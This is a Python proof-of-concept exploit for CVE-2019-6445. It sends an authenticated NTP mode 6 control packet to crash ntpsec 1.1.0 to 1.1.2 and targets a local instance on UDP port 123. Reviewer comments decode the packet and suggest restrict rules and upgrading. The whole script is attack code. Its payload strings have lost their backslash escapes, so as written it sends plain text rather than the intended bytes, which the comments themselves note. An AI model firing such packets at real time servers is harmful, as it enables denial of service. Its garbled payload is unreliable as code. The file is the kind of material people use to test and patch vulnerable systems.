#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-npe
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
# CVE: CVE-2019-6445
# Note: this PoC uses Keyid 1 with password 'gurka'

import sys
import socket

# Datagram payload for the proof of concept, kept exactly as the page gives it.
# NOTE(review): the literals contain no backslashes, so `buf` is 108 characters
# of plain ASCII text ("x16x03..."), not 36 raw bytes. The "\x" escapes appear
# to have been lost when the page was extracted; confirm against the advisory
# linked in the header.
# Read as hex values, the 36 octets look like an NTP mode 6 (control) message:
#   16 03                  -> version 2, mode 6; opcode 3 (write variables)
#   00 03 / 00 00 / 00 00  -> sequence, status, association id
#   00 00 / 00 04          -> offset 0, count 4
#   6c 65 61 70            -> the ASCII text "leap"
#   00 00 00 01            -> key id 1 (the header note mentions Keyid 1)
#   final 16 octets        -> presumably the keyed digest for that key
# Detection/mitigation: the header marks this as an authenticated request, so
# exposure depends on who holds a control key and who may send mode 6 traffic.
# `restrict ... nomodify noquery` in ntp.conf limits that, and the listed
# affected versions (1.1.0 to 1.1.2) should be upgraded.
buf = "".join([
    "x16x03x00x03x00x00x00x00x00x00x00x04x6cx65x61x70",
    "x00x00x00x01x5cxb7x3cxdcx9fx5cx1ex6axc5x9bxdfxf5",
    "x56xc8x07xd4",
])

# The destination is the loopback address on the NTP port (UDP 123), i.e. a
# local test instance.
target = ('127.0.0.1', 123)

# A single UDP datagram is sent; no reply is read and the socket is not
# closed explicitly. Passing a str to sendto() is accepted by Python 2 only;
# Python 3 requires a bytes-like object.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, target)